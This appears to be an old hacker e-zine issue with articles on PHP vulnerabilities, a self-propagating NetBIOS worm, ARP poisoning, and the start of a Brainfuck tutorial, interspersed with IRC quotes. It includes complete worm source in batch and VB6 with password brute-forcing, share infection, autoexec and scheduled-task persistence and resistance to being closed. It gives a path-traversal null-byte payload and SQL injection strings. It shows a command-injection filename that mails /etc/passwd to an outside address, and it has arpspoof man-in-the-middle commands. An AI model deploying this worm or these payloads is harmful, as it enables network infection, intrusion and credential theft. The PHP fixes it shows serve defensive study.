Thanks to: Kursu for teaching me some of the GDB stuff and the basis of
this method.
Hello to: Killswitch, teraphex, Sub, nocho, PHiZ, Ramius345, Nahun, Garwick,
Shawn2k2 (Shawn Colley), the Zoite crew, the nettwerked crew, and the nettwerked
BBS(no not a forum, but a real dial-up/telnet BBS node so all us youngins can
feel cool for using a real BBS :p).
-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-
-
<Rustblade> err
<theclone> Rustblade you need some C.L.R. and you can be shineyblade
<Rustblade> hehehe
* Rustblade douses himself in C.L.R
-
-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-
PHP (In)Security
- sub <subopius@gmail.com>
Introduction
I'm gonna start off by saying that, just like any other developed language,
PHP is not an insecure language. But it does have insecure implementations.
Some of it is because of an insecure configuration, and some of it is due to
insecure code. But if you want my opinion, if you write your code secure
enough, the configuration won't really be an issue.
include(),fopen(), and GET variables
One of the common uses of PHP is to provide a very primitive (yet, functional)
templating system. The code is usually something very similar to the following:
--- BEGIN index.php ---
<?php
/*
* index.php Provides a basic templating system
* Code is also a proof-of-concept for
* what happens when you don't check your
* $_GET[] variables.
*
*/
if(isset($_GET['page'])) {
$page = $_GET['page'];
} else {
$page = "main";
}
include("template/header.php");
include("content/{$_GET['page']}.php");
include("template/footer.php");
?>
--- END index.php ---
This script looks simple enough. A visit to index.php with no arguments will
set $page to "main", resulting in the script including "content/main.php".
But if you pass it arguments, like "index.php?page=contact," then your script
will end up including "content/contact.php," however, if you happen to try to
include a file that doesn't exist, such as "index.php?page=dontexist,"
depending on your level of error reporting, you'll be given an error similar
to the following:
Warning: main(content/dontexist.php): failed to open stream:
No such file or directory in /usr/www/index.php on line 19
I know what you're thinking. Who the fuck cares, right? Wrong, genius,
now we know how many directories in we are from root ("/"). So what do we do?
We fire up our web browser again and this time browse to
"index.php?page=../../../etc/passwd".
But alas, we're given a similar error:
Warning: main(content/../../../etc/passwd.php): failed to open stream:
No such file or directory in /usr/www/index.php on line 19
Because our include() statement tacks on a ".php" to the end of the string,
it's looking for /etc/passwd.php (obviously.) But there's no way to get around
that one. Or is there?
If "magic_quotes_gpc" is "Off" in the php.ini, there is. Otherwise, you're
screwed. But the default for PHP4 is "On" so it's a little harder to bump into,
But for the sake of this proof-of-concept, we're assuming it's Off.
So you have a little background, if you didn't already know, the NULL (\0)
character (usually, when a strlen isn't specified,) signifies the end of a
string. I should also note that PHP automatically converts the hex encodings
in a URL, so if you do something like "index.php?page=../../../etc/passwd%00"
then you've just inserted a NULL character into the middle of your string.
And OMG! Guess what! You've just output the contents of /etc/passwd to your
web browser!
So what happens if "magic_quotes_gpc" is "On"? Mmm, nothing, really. But
you get this error, because PHP automatically escapes special characters:
Warning: main(content/../../../etc/passwd\0.php): failed to open stream:
No such file or directory in /usr/www/index.php on line 19
So how can you fix it? Well if you didn't notice, I've been mentioning
"magic_quotes_gpc" an awful lot. You could try setting that to "On" in
your php.ini. Or if that's not an option, or you don't want your code's
security to rely on your server's configuration, you can use addslashes()
and escape any special characters. So take the code block:
if(isset($_GET['page'])) {
$page = $_GET['page'];
} else {
$page = "main";
}
and change it to
if(isset($_GET['page'])) {
$page = addslashes($_GET['page']);
} else {
$page = "main";
}
and you should be golden! Another possibility is to use str_replace() or
regex, but addslashes() does the trick just fine. You might also want to
look into escaping periods as well, to prevent against the "../" parent
directory bullshit. Basically, escape your GPC (GET/POST/COOKIE) input.
SQL Injection
Another result of unescaped input is the famous SQL injection-style
vulnerability. This works by "injecting" SQL commands into an already
existing query. For our proof of concept we use the following table:
CREATE TABLE `users` (
`id` int(11) NOT NULL auto_increment,
`username` varchar(30) NOT NULL default '',
`password` varchar(30) NOT NULL default '',
PRIMARY KEY (`id`),
UNIQUE KEY `username` (`username`),
KEY `password` (`password`)
) TYPE=MyISAM AUTO_INCREMENT=3 ;
INSERT INTO `users` VALUES (1, 'admin', 'passw0rd');
INSERT INTO `users` VALUES (2, 'some_user', 'abcd');
If you want to see that graphically then here you go:
+----+-----------+----------+
| id | username | password |
+----+-----------+----------+
| 1 | admin | passw0rd |
| 2 | some_user | abcd |
+----+-----------+----------+
Now the PHP script, for this example, a password-changing form:
--- BEGIN changepass.php ---
<?php
/*
* changepass.php Password-changing script
* Proof-of-concept for SQL
* Injection vulnerabilities
*
* Note: $id is set statically for demonstration purposes,
* In a normal environment this would be set by either
* GPC input and/or sessions.
*
*/
$id = 2;
$myLink = mysql_pconnect("dbserver","dbuser","dbpass");
mysql_select_db("database", $myLink);
// If user pressed "submit"
if(isset($_POST['submit'])) {
// And the passwords either didn't match or were NULL
if(!isset($_POST['passwd1']) || ($_POST['passwd1'] != $_POST['passwd2'])) {
die("Please set matching passwords (not null.)<br>\n");
// But if the passwords did match and were _not_ NULL
} else {
$passwd = $_POST['passwd1'];
$query = "UPDATE users SET password='$passwd' WHERE id='$id'";
// Update the database
$result = mysql_query($query);
die("Password successfully updated.<br>\n");
}
}
$result = mysql_query("SELECT id,username,password FROM users WHERE id='$id'");
$array = mysql_fetch_array($result);
?>
Password change for user: <b><?php echo $array['username']; ?></b><br>
<form name="chpass" method="POST" action="<?php echo $_SERVER['PHP_SELF']; ?>">
<input type="password" name="passwd1" value=""><br>
<input type="password" name="passwd2" value=""><br>
<input type="submit" value="submit" name="submit">
</form>
--- END changepass.php ---
If you didn't read the comments, or are maybe a bit slow, what the script does
check to make sure the two password fields are not NULL and match. If that's
the case, then it updates the database with the new password. Fortunately, this
genius developer (myself, actually) forgot to escape his GPC input, sound a
little familiar?
Because our input isn't escaped, we can input something similar to the
following: (in both password fields, without the double-quotes)
"0wned' WHERE id=1 # "
Which results in the following SQL query being sent:
UPDATE users SET password='0wned' WHERE id=1 # ' WHERE id='2'
And in SQL, just like any other language, the hash (#) signifies a comment. Of
course, if you don't know admin's user ID, and it's not 1, which it should be,
because that would be the first user created, you could also do:
"0wned' WHERE user_name='admin' # "
Resulting in:
UPDATE users SET password='0wned' WHERE user_name='admin' # ' WHERE id='2'
So how do you prevent that from happening? The same way you fix everything,
escape your GPC input! Where I have:
$passwd = $_POST['passwd1'];
You could replace with:
$passwd = mysql_real_escape_string($_POST['password'], $myLink);
Remember from above, $myLink is your mySQL resource. Or you could use
mysql_escape_string($str), however, mysql_escape_string() does not take
the current character set into account, while mysql_real_escape_string() does.
system() Call Injection
For this example we're going to look at a file upload script. Here it is:
--- BEGIN upload.php ---
<?php
/*
* upload.php File upload script, example
* taken from php.net, heavily
* modified to make a decent
* proof-of-concept
*
*/
// In PHP versions earlier than 4.1.0, $HTTP_POST_FILES should be used instead
// of $_FILES.
$mv = "/bin/mv";
// If the user presses "submit" ...
if(isset($_POST['submit'])) {
$uploaddir = "/usr/www/upload/";
$uploadfile = $uploaddir . $_FILES['userfile']['name'];
// Move the damn file
system("$mv {$_FILES['userfile']['tmp_name']} $uploadfile", $status);
}
?>
<form enctype="multipart/form-data" method="POST"
action="<?php echo $_SERVER['PHP_SELF']; ?>">
<input type="hidden" name="MAX_FILE_SIZE" value="30000" />
Send this file: <input name="userfile" type="file" />
<input type="submit" name="submit" value="Send File" />
</form>
--- END upload.php ---
Looks harmless enough, but let's look again:
system("$mv {$_FILES['userfile']['tmp_name']} $uploadfile")
It doesn't look it would be too hard into tricking this script into
executing a shell command of our own, with a little creativity you could
do just about anything.
So let's pretend I got creative and created a filename on my system
that, when executed, would mail me /etc/passwd, a filename that looks
like this:
;php -r system(base64_decode(
\"bWFpbCBzdWJvcGl1c0BnbWFpbC5jb20gPCAvZXRjL3Bhc3N3ZA==\"));
So when we upload that file, the php script does it's thing and ends up doing:
/bin/mv /tmp/yourtmpfilename /usr/www/upload/;
php -r system(base64_decode(
\"bWFpbCBzdWJvcGl1c0BnbWFpbC5jb20gPCAvZXRjL3Bhc3N3ZA==\"));
Which roughly translates to:
mail subopius@gmail.com < /etc/passwd
Of course, this particular example relies on the CLI version of PHP being
installed. You can do the same with perl and with regular shell scripts, but
I thought this was a neat example.
Now, there's two things wrong with this one. The first is the same as all
of the others, unsanitized input. PHP has some functions already built-in
to use with system() and exec() calls: escapeshellcmd() and escapeshellarg(),
so simply by doing
$mv = escapeshellcmd("/bin/mv");
$uploadfile = escapeshellarg($uploaddir . $_FILES['userfile']['name']);
We could've solved alot of problems. The _other_ thing wrong, is that
PHP has a built in rename() function, and better yet, also has a
move_uploaded_file() function, so I suggest steering clear of system()
calls unless they are absolutely neccessary, especially if there already
built-in functions to do the job.
Conclusion
There are other PHP-related vulnerabilities as well (ie: the system()
function), however, include() and SQL injection vulnerabilities are probably
some of the most common in the field when it comes to unsanitized input.
If you decide for some reason you need to use a system() call, please look
to make sure there isn't another, more secure, means of doing whatever it is
you have to do. It's probably also a good idea to test your code under
different configurations because PHP parses things differently under
different settings.
References
http://www.php.net/ Home of PHP, I use their function lookup
http://www.mysql.com/ Home of uhh, MySQL, I used their manual
-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-
-
<hades> clone!
<hades> guess where I am!
<theclone> at the creditors office
<tek> drowning in a sea of debt?
-
-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-
*******************************************************************************
*******************************************************************************
** **
** Simple NetBIOS worm - A study in potential exponential growth **
** **
** **
** .oO0Oo. By Aftermath .oO0Oo. **
** **
*******************************************************************************
*******************************************************************************
Disclamer: The author is not responsible for your actions. The following
code is mearly used for study.
"Keep your friends close, but your enemies closer"
I can't remeber where I first heard this saying, probibly in some movie, but
I have heard it more than once. Lately I have been working with system
administrators at a community college. Early in the month of May, I went to
work and seen a lot of the computers were doing things didn't usuly do. I
was told it was a new worm called the "sasser". For most computers, all you
would need to do is go to the windows update site and get patched. This
sounded easy, untill I found out that every time a computer got infected or
reinfected, the computer would restart within 60 seconds. On top of that, we
used deep freeze 4.2 and this means that we have to unfreeze and restart
before applying the patch, then freeze the machine again. It was very time
consuming given that we had to patch over 200 computers. After that, I
wanted to learn a bit about worms, just because I would be dealing with
them.
What I did: A netBIOS worm written in Visual Basic 6.0. Technically it's
really easy to understand. It simply exploits open shares with weak
passwords. How it works and how its done is documented in the code. To
understand it all you need is a little knowledge of VB and batch syntax.
At first, I created a program in VB that would create a batch script that
would be called from the autoexec.bat, but then I realized that I didn't
need the VB to do that, so I just made the batch file, which you will see in
a moment. It's really easy to understand, but it only works on a LAN because
it doesn't have the dictionary attack feature that the VB one does and
almost all internet netBIOS shares have a username and password.
The Batch worm:
@echo off
cls
REM setting the variables.
set var1=2
set var2=0
set var3=0
set var4=0
:loopline
REM Helpdat.bat is the name of this file and it gets copied over to the c$
drive of the remote
Rem machine
copy c:\helpdat.bat \\%var1%.%var2%.%var3%.%var4%\C$
REM Deletes autoexec.bat on remote machine
del /F /Q \\%var1%.%var2%.%var3%.%var4%\C$autoexec.bat
REM The next line copies over your custom made autoexec.bat file that you
made that will
REM start the program again on start up.
copy C:\autoexec.bat \\%var1%.%var2%.%var3%.%var4%\C$autoexec.bat
REM These next lines up the IP address by one.
set /A var4 = var4+1
if %var4%==255 (
set %var4%=0
set /A %var3%=%var3%+1
if %var3%==255 (
set %var3%=0
set /A %var2%=%var2%+1
if %var2%==255 (
set %var2%=0
set /A %var1%=%var1%+1
if %var1%==255 (
%var1%=1
if %var1%==127 (
set %var1%=128
)))))
REM This completes the loop and brings it back to the beginning
goto loopline
REM End of program
There are some really obvious flaws with this propagating. First would be
that it would never be able to spread on the internet because all netBIOS
shares on the net need a user name and password. This WOULD spread, however,
on a LAN that did not have passwords on their shares. Another really obvious
flaw is that every time the user turns on their machine, a dos window will
pop up and be really obvious that the computer is doing something that it's
not supposed to. With the next revision that I made of this, I fixed these
two flaws and improved it in more ways that batch could offer.
How it's compiled:
You would have to put all of this code into a vb projects form1 code. You
would need a file named pw.txt in the location C:\ with passwords. You would
also need to execute the executable from the path C:\windows. I dont think
that this program would work on windows 2000 or NT because of the file
structures they use, but I see no reason why it shouldn't work on 98, 95, ME
and XP, although the code could easily be modified to work on 2000 and NT.
'declaring the variables used in the program
Public pw, reset1, ipstring, adminvar, path1, localipaddy, pwpath As String
Public winpath, apppath As String 'pw is the password
Public ip1, ip2, ip3, ip4, poo, winsize, poopoo As Integer
Private Sub Form_Load()
Randomize
'this is the first octet of the ip being put into the variable ip1
'from my understanding, this is similar to how the sasser randomized it's IP
addresses
'but I think it was much more random, in that EVERY ip it tries is
completely random.
ip1 = Int(Rnd * 254 + 1)
If ip1 = 127 Then
Call Form_Load 'if ip1 = 127 (aka localhost) then call
form_load to try again
End If
Form1.Visible = False 'makes the form invisible to the user
'this sets the path and file name of where the password dictionary file
is stored
'into a varialbe
pwpath = "C:\pw.txt "
'stores the path of where the worm file is going to be placed into a
variable.
'it is also used to direct where the password file is going to be placed
winpath = "C:\WINDOWS\ "
'the path and file name of the worm file.
apppath = "C:\WINDOWS\helpdat.exe"
'the administrator variable
adminvar = " ADMINISTRATOR "
'this is the creation of the rest of the octets of the ip number, being put
into variables
ip2 = Int(Rnd * 254 + 1)
ip3 = Int(Rnd * 254 + 1)
ip4 = 0
ipstring = " \\" & ip1 & "." & ip2 & "." & ip3 & "." & ip4 & "\"
'this is the start of the main loop that will try every IP addy untill the
computer or program
'gets shut down.
Do
'this do loop is for the start of the brute forcer and will continue untill
the eof
Do
'this will open the password file for the dictionary attack.
Open "c:\pw.txt" For Input As #1
'inputs the current dictionary word into the password variable
Line Input #1, pw
'copies the path the password file to remote machines IPC$ share.
vbHide hides the
'dos window. pw is the password and adminvar is the word
"ADMINISTRATOR"
Shell "copy " & pwpath & ipstring & "IPC$" & winpath & adminvar &
pw, vbHide
'copies the worm file to the IPC$ share in the windows directory
Shell "copy " & apppath & ipstring & "IPC$" & winpath & adminvar &
pw, vbHide
'these two next lines do the exact same, but with with "C$" share
Shell "copy " & pwpath & ipstring & "C$" & winpath & adminvar & pw,
vbHide
Shell "copy " & apppath & ipstring & "C$" & winpath & adminvar & pw,
vbHide
'this next line inserts the batch code to start the worm file in the
autoexec file
'so every time the computer starts, so will the worm
Open ipstring & "IPC$\autoexec.bat" For Append As #2
Print #2, "C:\WINDOWS\helpdat.exe"
Close
'same as above, but with the c$ share
Open ipstring & "C$\autoexec.bat" For Append As #2
Print #2, "start C:\WINDOWS\helpdat.exe"
Close
'this line sets the program into a dos based task scheduler to run
'the worm file.
Shell "at " & ipstring & adminvar & pw & " 12:00AM start
C:\WINDOWS\helpdat.exe /EVERY MONDAY ", vbHide
'you can also add this same line but with the IPC$ share and on differnt
days of the 'week.
Loop Until EOF(1)
'ends the loop when the password file is no more
'this chunk of code just adds one to the ip address octet it's working on
similar to the one in 'the batch file. If that octet = 255 it gets set back
to 0 and the one before it moves up one. 'Same rules apply to that one too.
ip4 = ip4 + 1
If ip4 = 255 Then
ip4 = 0
ip3 = ip3 + 255
If ip3 = 255 Then
ip3 = 0
ip2 = ip2 + 1
If ip2 = 255 Then
ip2 = 0
ip1 = ip1 + 1
If ip1 = 255 Then
ip1 = 1
End If
End If
End If
End If
'if ip1 = 127 or 255 then ip1 will become another number.
If ip1 = 127 Then
Randomize
Do Until ip1 <> 127 or ip1 <> 255
ip1 = Int(Rnd(254 + 1))
Loop
End If
doevents
loop
'end of the main loop
End Sub
Private Sub Form_Unload(Cancel As Integer)
'this line makes it so you cant simply end the program
Cancel = 1
'if you do some how end the program, the worm will try to start up all over
again using
'this line:
Shell "start C:\WINDOWS\helpdat.exe"
End Sub
'end of program
NOTES:
This revision of the worm has several very obvious improvements. First would
be that it is not visible to the user at all, second it dictionary attacks
shares, it is able to spread on the internet and third it starts up on it's
own not only with the use of autoexec.bat, but on scheduled times during the
week using the DOS 'AT' command. Also, if the user ctrl-alt-del to see their
tasks, and try to end the worm program, it tries not to end, but if the user
some how does end the program, the VB code tries to restart itself. This
revision of the worm also tries to find open IPC$ shares as well as C$
shares, and can be altered to try ADMIN$ and/or D$ shares aswell. I could
have also added an administrator brute force, where the administrator
variable might start off with "Aardvark" and then tried all the passwords,
then changed the administrator variable to "Abicus" and so on, but this
doesn't seam practical. I could add lots of stuff to the code to make it
more effective and give it a payload, but our goal was just to learn how
worms spread. I also know that this code could be MUCH more efficent by
putting more of the DOS commands into variables and taking out the comments.
Also, there are lots of non routable addresses that may be randomly
generated by the IP generater such as 11.x.x.x and 2.x.x.x (Im *pretty* sure
these are non routable, but even if they are not, you get what I'm saying.).
I have found that on an average PC, it dictionary attack, insert it's files,
set the start up times, modify the autoexec.bat files and move onto the next
ip in less than a second, but it mostly depends on the network speed and
partly on how quick the infected computer is.
These two worms pose more threat to LANs than they do the internet, that is,
if they pose any threat on the internet at all! If released on the inside of
a lan they may spread, but on the internet it would be doubtfull that eather
of them would infect a single computer in less than a day of randomly trying
netBIOS shares. A little modification to either one, but more so to the VB
one, and if the windows network protocols are not properly secured, they may
do a significant amount of damage to a LAN. Five years ago these may have
had some success, but today they are mearly used as a study in how a worm
could use a dictionary attack against a service, how quickly they cycle and
the potential impact they may have. I hope you learned as much about worms
reading this file as I did making it.
Feedback: aftermath12345@hotmail.com
-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-
-
<tek> masturbation is like so totally last season!
-
-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-
The Wonderful World of ARP Poisoning
- sub <subopius@gmail.com>
Introduction
To be honest, I haven't written in a while and I'm having trouble thinking
of a good way to organize this. So I'll just write as I think of it, so
fuck off, eh?!
What is ARP? ... and what's the problem?
From wikipedia:
The Address Resolution Protocol is a method for finding a host's
Ethernet (MAC) address from its IP address. The sender broadcasts
an ARP packet containing the Internet address of another host and
waits for it (or some other host) to send back its Ethernet address.
Each host maintains a cache of address translations to reduce delay
and loading.
Well I couldn't have said better myself, so I didn't. Now, the "problem"
with ARP (I prefer to use the term "feature," myself) is that you can
broadcast (or even unicast to be uber-stealthy) ARP reply packets without
them being requested, allowing you to update your target(s) ARP caches
whenever you so desire. Fucken A, man ... fucken a.
Well, that's great, but how does it work?
Good question, fucker, let's take a look at a real live ARP packet!
00 50 da 31 94 6d 00 0f 66 35 f1 5c 08 06 00 01
08 00 06 04 00 02 00 0f 66 35 f1 5c c0 a8 00 03
00 50 da 31 94 6d c0 a8 00 66 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00
What? You don't get it yet? K, here we go then ... the full Ethernet packet
is 60 bytes long, or short. Since the ARP packets don't take up the whole
60 bytes along with the Ethernet header, it ends with an 18 byte trailer.
ARP packets do not generate checksums.
ETHERNET
Destination hw (6 bytes): 00 50 da 31 94 6d
Source hw (6 bytes): 00 0f 66 35 f1 5c
Type (2 bytes): 08 06 0x0806 is the code for ARP
ARP
Hardware Type (2 bytes): 00 01 0x0001 = Ethernet
Protocol (2 bytes): 08 00 0x0800 = IP
Hardware size (1 byte): 06 length of hw addresses (bytes)
Protocol size (1 byte): 04 length of proto addr, IP here
ARP OP-Code (2 bytes): 00 02 0x0002 = reply;0x0001 = request
Sender hw (6 bytes): 00 0f 66 35 f1 5c This is what's spoofed
Sender ip (4 bytes): C0 A8 00 03 heh ... 192.168.0.03
Target hw (6 bytes): 00 50 DA 31 94 6D
Target ip (4 bytes): C0 A8 00 66 192.168.0.102
ETHERNET (again)
Trailer (18 bytes): 00 00 00 00 00 00 Just completing a 60byte ether-
00 00 00 00 00 00 net packet.
00 00 00 00 00 00
We'll go over this again later down the road. Now before we begin lets touch
the disadvantages of ARP Poisoning.
Disadvantages of ARP Poisoning
It won't get you laid.
Advantages of ARP Poisoning
Now moving on, I'll briefly cover some of the advantages of ARP Poisoning.
This probably isn't all of them, but it's enough to keep any hacker happy,
and if it's not, use your imagination, I'm sure you can think of something.
First off, you'll probably _never_ run into a network that ARP Poisoning
isn't possible on. Why? Because on large networks, and even smaller ones,
it's extremely hard to prevent against ARP poisoning.
The only real way to prevent against it without hacking up a shell script
to manually add entries to the ARP cache and lock it is to run arpwatch
or something similar and just monitor it. Port security features on switches
may also work unless your router is vulnerable to MAC flooding (see below.)
For only $9.99 and a limited understanding of ARP Poisoning you get all this!
Denial of Service Attacks
Using ARP Poisoning it's possible to send an ARP packet that has an invalid
MAC address allowing you to disassociate a specified IP in your target's cache.
Usually this is going to be their router. By doing this, the router won't
receive the packets because they don't contain its MAC address. Haw haw,
we are a sly fox, no?!
Man in the Middle Attacks
This is the cool shit, right here. This is what got me to learn about ARP
Poisoning. There ARE other ways to implement man in the middle attacks,
however, ARP will work regardless of OS, and can't really be 'turned off' or
filtered without breaking something, such as UPNP or icmp-redirects. Man in
the Middle attacks work great on switched networks where you can't normally
sniff/hijack/jerk off connections because they're not coming down your line.
This works by telling both parties that each other's MAC address is none other
than your own and enabling IP forwarding. Normally on a switched network it
works like this:
gateway hax0r :( computar!
aa:aa:aa cc:cc:cc dd:dd:dd (shortened)
192.168.0.1 192.168.0.5 192.168.0.10
\ |
\______________________________________________|
With the arp tables on computar displaying:
Address HWtype HWaddress Flags Mask Iface
192.168.0.1 ether AA:AA:AA:AA:AA:AA C eth0
192.168.0.5 ether CC:CC:CC:CC:CC:CC C eth0
192.168.0.10 ether DD:DD:DD:DD:DD:DD C eth0
The switch isn't drawn in because the computers don't know it's there, so
why should you? It's transparent, dickweed. Using arpspoof, available with
the dsniff package, and making sure we have ip forwarding turned on we do
something similar to the following:
$ echo "1" > /proc/sys/net/ipv4/ip_forward # turns on ip forwarding
$ arpspoof -i eth0 -t 192.168.0.1 192.168.0.10 &
$ arpspoof -i eth0 -t 192.168.0.10 192.168.0.1 &
After some smooth talking and sending out those 1337 arp packets it'll look
like this:
gateway hax0r :) computar!
aa:aa:aa cc:cc:cc dd:dd:dd (shortened)
192.168.0.1<------->192.168.0.5<-------->192.168.0.10
And the arp tables for computar will look like _this_ now:
Address HWtype HWaddress Flags Mask Iface
192.168.0.1 ether CC:CC:CC:CC:CC:CC C eth0
192.168.0.5 ether CC:CC:CC:CC:CC:CC C eth0
192.168.0.10 ether DD:DD:DD:DD:DD:DD C eth0
And of course, for gateway it'll be the other way around:
Address HWtype HWaddress Flags Mask Iface
192.168.0.1 ether AA:AA:AA:AA:AA:AA C eth0
192.168.0.5 ether CC:CC:CC:CC:CC:CC C eth0
192.168.0.10 ether CC:CC:CC:CC:CC:CC C eth0
Also, do note that 192.168.0.5 won't necessarily be in the arp tables. You
can view your own arp tables by typing "arp" with no arguments at a console.
An ARP packet from hax0r to gateway would look like this!
AA AA AA AA AA AA CC CC CC CC CC CC 08 06 00 01
08 00 06 04 00 02 DD DD DD DD DD DD C0 A8 00 0A
AA AA AA AA AA AA C0 A8 00 01 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00
Broken down again, it'll look like this:
ETHERNET
Destination hw (6 bytes): AA AA AA AA AA AA
Source hw (6 bytes): CC CC CC CC CC CC Still hax0r's MAC, could
probably still be spoofed since
it's local.
Type (2 bytes): 08 06 0x0806 is the code for ARP
ARP
Hardware Type (2 bytes): 00 01 0x0001 = Ethernet
Protocol (2 bytes): 08 00 0x0800 = IP
Hardware size (1 byte): 06 length of hw addresses (bytes)
Protocol size (1 byte): 04 length of proto addr, IP here
ARP OP-Code (2 bytes): 00 02 0x0002 = reply;0x0001 = request
**** PAY ATTENTION HERE ***
Sender hw (6 bytes): DD DD DD DD DD DD computar's mac!
Sender ip (4 bytes): C0 A8 00 0A computar's ip (192.168.0.10)
Target hw (6 bytes): AA AA AA AA AA AA gateway's mac
Target ip (4 bytes): C0 A8 00 01 gateway's ip (192.168.0.1)
ETHERNET (again)
Trailer (18 bytes): 00 00 00 00 00 00 Just completing a 60byte ether-
00 00 00 00 00 00 net packet.
00 00 00 00 00 00
It's like a threesome! Now you can sniff all of that wonderful data, and with
some code`fu you can probably rewrite some of the packets as they flow through.
I _think_ you could possibly do all-out session hijacking since you're getting
the packets with the sequence #s in them. It should be possible to break down
the packets, modify the data (of say ... a telnet stream,) rebuild them with
the original sequence # (since we know it's correct) and recalculate the
checksum. Then send it off to its real owner and viola! It's yours! But don't
quote me on that, because I've yet to test that theory. From here it's also
possible to move onto SSH hijacking and other goodies, but to be honest, I
never took it that far.
MAC Flooding
This one I've only heard of, I've never actually seen it done, so I'm not
entirely too sure what it works on. I read about it in an article that was
using scare tactics to promote "good" security. Whatever, fuck 'em anyways.
It basically works by just flooding a switch with all different IPs and MAC
addresses until the its ARP table fills up, causing some switches to turn off
port security features and drop into a hubbed mode, broadcasting everything
on every port.
Conclusion
Well, that about covers it, there's some more fun you can do with it regarding
802.11, but that's not really my game and I haven't gotten to dick around with
it yet. Just have fun kids, and wrap it up, will ya?
Tools
dsniff http://www.monkey.org/~dugsong/dsniff/
My personal fav, contains arpspoof, webmitm, sshmitm, etc.
arpoison http://arpoison.sourceforge.net/
Haven't actually tried it, but it's small and stand alone.
arpmonitor http://planeta.terra.com.br/informatica/gleicon/code/index.html
Monitors and logs ARP requests and replies
References
Wikipedia
http://en.wikipedia.org/wiki/Address_Resolution_Protocol
Playing redir games with ARP and ICMP
http://www.hoobie.clara.net/security/exploits/arp_fun.txt
Anatomy of an ARP Poisoning Attack: Security Basics*
http://www.watchguard.com/infocenter/editorial/135324.asp
* This is the site that uses the scare tactics, doesn't help much with the
technical aspects. Back in the day I had a couple more texts I referred to but
I can't seem to find them anymore.
If you understand others you are smart.
If you understand yourself you are illuminated.
If you overcome others you are powerful.
If you overcome yourself you have strength.
If you know how to be satisfied you are rich.
If you can act with vigor, you have a will.
If you don't lose your objectives you can be long-lasting.
If you die without loss, you are eternal.
- Tao Te Ching, Chapter 33
-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-
-
<l0rd_hex> lol datapac is like an abandoned car
<l0rd_hex> it's pretty enpy
<l0rd_hex> *empty
<l0rd_hex> but you can still have sex in it!
<theclone> hahahahaha
<l0rd_hex> that was my motta for fridges too but
I almost sufficated a while back :|
-
-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
BrainFuck Programming Tutorial
by: omin0us <omin0us208@gmail.com>
>+++++[>+++++++++++++++>+++++++++<<-]>.>.++++.<<++
+++[>++++++<-]>.+++++.<+++[>---<-]>.<+++[>>-----<<
-]>>--.[-]<<++[>+++++<-]>.++++++++.<+++[>---<-]>.+
++++.<++++++++[>----------<-]>---.<<+++++[>+++[>++
+++<-]<-]>>-.<<++[>+++++[>------<-]<-]>>++..>+++++
+++++.>[omin0us <omin0us208@gmail.com> K-1ine #44]
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] Sections
[1] Introduction
[2] Basics
[3] Input
[4] Tricks
[5] If Statements
[6] Compilers and Interpretors
--[ 1 ] INTRODUCTION
Brainfuck is probably the craziest language i have ever had the pleasure of
coming across. And, yes, there are quite a few tutorials that you will find on
google about the language and how to program in it, but i am writing this one
to hopefully be a bit more comprehensive. As most of them that you will find
seem to only cover just the basics of using the operators. Anyways, the lang-
uage itself is a Turing-complete language created by Urban Müller. The language
only consists of 8 operators, yet with the 8 operators, <>+-[],. you are
capable of writing almost any program you can think of. To write programs in
brainfuck, i would suggest you get a few things first. 1. An interpretor or
a compiler (i don't fucking care what its called DakeDesu). An experienced
programmer could easily write one quite quickly after reading this. If you don't
quite know how to write one, I have included the source to a Brainfuck-to-C
interpretor that I wrote in C as well as one that I wrote in BrainFuck itself.
Also i have included the source for the worlds smallest Compiler (171 bytes)
written in x86 assembly by Brian Raiter. You'll find all those in the last sec-
tion of this tutorial. Next, i would suggest an ASCII chart with all the ASCII
chars and their decimal equivalent value. Next on the items is would be a cal-
culator. Any will do. It will help you figure out the Greatest Common Factors
for use in incrementing a memory block quickly. Lastly, i would recommend
having no life and lots of time on your hands to actually want to sit and write
programs in this amazingly inefficient language. I promise you, if you take the
time to sit and write a program in brainfuck for an hour or five, you will
definitly see why it deserves its name.
--[ 2 ] BASICS
The idea behind brainfuck is memory manipulation. Basically you are given an
array of 30,000 1byte memory blocks. The array size is actually dependent upon
the implementation used in the compiler or interpretor, but standard brainfuck
states 30,000. Within this array, you can increase the memory pointer, in-
crease the value at the memory pointer, etc. Let me first present to you the 8
operators available to us.
> = increases memory pointer, or moves the pointer to the right 1 block.
< = decreases memory pointer, or moves the pointer to the left 1 block.
+ = increases value stored at the block pointed to by the memory pointer
- = decreases value stored at the block pointed to by the memory pointer
[ = like c while(cur_block_value != 0) loop.
] = if block currently pointed to's value is not zero, jump back to [
, = like c getchar(). input 1 character.
. = like c putchar(). print 1 character to the console
Some rules:
- Any arbitrary character besides the 8 listed above should be ignored by the
compiler or interpretor. Characters besides the 8 operators should be con-
sidered comments.
- All memory blocks on the "array" are set to zero at the beginning of the
program. And the memory pointer starts out on the very left most memory
block.
- Loops may be nested as many times as you want. But all [ must have a corre-
sponding ].
Lets start with some examples of how to program in brainfuck.
The simplest program in brainfuck is:
[-]
